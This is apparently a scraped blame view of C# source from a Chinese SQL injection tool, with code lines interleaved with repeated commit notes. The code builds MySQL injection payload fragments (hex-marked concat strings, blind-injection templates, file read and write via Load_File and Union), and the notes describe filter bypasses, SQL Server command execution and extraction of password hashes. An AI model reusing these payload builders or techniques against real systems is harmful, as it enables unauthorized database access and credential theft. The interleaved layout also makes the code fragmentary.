+								            }
 								            sb.Append(")");
 								            if (!Tools.checkEmpty(dbName))
 								            {
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								                sb.Append(" from `" + dbName + "`.");
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								                if (!Tools.checkEmpty(table))
 								                {
 								                    sb.Append(table);
 								                }
 								            }
 								            else
 								            {
 								                if (!Tools.checkEmpty(table))
 								                {
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								                    sb.Append(" from `" + table+ "`");
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								                }
 								            }
 								            if (limit >= 0)
 								            {
 								                sb.Append(" limit " + limit + ",1)");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								            }
 								            return sb.ToString();
 								        }
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        /// <summary>
 								        /// 生成查询列数据
 								        /// </summary>
 								        /// <param name="columns">列明</param>
 								        /// <returns></returns>
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								        public static String concatMySQLColumnStr(List<String> columns)
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        {
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								            StringBuilder sb = new StringBuilder("concat(0x5e5e21,concat_ws(0x242424,");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								            for (int i = 0; i < columns.Count; i++)
 								            {
 								                if (columns.Count > 1)
 								                {
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
-												update20190811

update20190811

											
										
										
											2019-08-10 17:46:18 +08:00
+								                    sb.Append("ifnull("+columns[i] + ",0x20),");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								                else
 								                {
-												update20190811

update20190811

											
										
										
											2019-08-10 17:46:18 +08:00
+								                    sb.Append("ifnull(" + columns[i]+ ",0x20)");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								            }
 								            if (columns.Count > 1)
 								            {
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								                sb.Remove(sb.Length - 1, 1);
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								            }
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								            sb.Append("),0x215e5e)");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								            return sb.ToString();
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								        }
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        /// <summary>
 								        /// 生成查询列数据
 								        /// </summary>
 								        /// <param name="columns">列明</param>
 								        /// <returns></returns>
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								        public static String concatMySQLColumn(String column)
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        {
 								            StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
 								            sb.Append(column);
 								            sb.Append(",0x215e5e)");
 								            return sb.ToString();
 								        }
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
-												20190111 V1.0 正式版---
修复PostgreSQL，盲注部分情况下某些字段作为排序字段会出错，导致无法获取数据的情况。
修复PostgreSQL、SQLite、DB2显错和Union注入获取时，部分数据类型无法转换和存在空值导致无法获取的情况。
修复日志处，复制payload报错问题。

											
										
										
											2019-01-10 22:27:46 +08:00
+								        public static String getBoolDataPayLoad(String column,List<String> columns, String dbName, String table, int index)
-												update20181212

20181212 V1.0 正式版---
修复MySQL盲注时，在某些情况下，获取的每列数据可能不对应的问题。
修复Oracle盲注获取数据的语句。
修复盲注时，提示需要配置Union注入问题。
优化配置文件，降低数据库类型漏报，增加oracle获取SYS_HASH的语句

											
										
										
											2018-12-12 17:29:32 +08:00
+								        {
-												20190111 V1.0 正式版---
修复PostgreSQL，盲注部分情况下某些字段作为排序字段会出错，导致无法获取数据的情况。
修复PostgreSQL、SQLite、DB2显错和Union注入获取时，部分数据类型无法转换和存在空值导致无法获取的情况。
修复日志处，复制payload报错问题。

											
										
										
											2019-01-10 22:27:46 +08:00
+								            String data = bool_data_value.Replace("{column}", column).Replace("{columns}", String.Join(",",columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
-												update20181212

20181212 V1.0 正式版---
修复MySQL盲注时，在某些情况下，获取的每列数据可能不对应的问题。
修复Oracle盲注获取数据的语句。
修复盲注时，提示需要配置Union注入问题。
优化配置文件，降低数据库类型漏报，增加oracle获取SYS_HASH的语句

											
										
										
											2018-12-12 17:29:32 +08:00
+								            return data;
 								        }
-												update20181221

20181221 V1.0 正式版---
修复盲注关键字判断机制，自动识别时，关键字相同且状态码相同才认为是true页面，解决在部分情况下可能出现错误500页面也存在同样关键字的问题。
修改SQLServer查询列时，使用char函数方式，避免单引号被过滤导致无法获取列名的问题。
修复SQLServer 执行命令，读写文件时，可能由于语句报错而导致读写文件失败的问题，优化提高成功率。
修复betweent and绕过时，将16进制字符替换了，导致语句错误而无法获取数据的问题。
修复自动识别在某些情况下跳过了错误显示注入检查。
修复Union注入重复发包判断列情况。
修复自动识别注入，在部分情况下无法正确判断数据库类型的问题。
修改爆出注入配置文件，降低漏报。
优化自动识别注入，如果程序判断支持盲注，会自动尝试使用order by去判断页面列数，提高Union注入检查的速度。
新增支持注入PostgreSQL文件读写功能。

											
										
										
											2018-12-21 16:08:29 +08:00
+								        /// <summary>
 								        /// 反射条调用，加载显示支持的文件操作
 								        /// </summary>
 								        /// <returns></returns>
 								        public static List<String> getShowCanDoFile() {
 								            List<String> list = new List<String>();
 								            list.Add("MySQL Load_File读文件");
 								            list.Add("MySQL Union写文件");
 								            return list;
 								        }
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								    }
 								}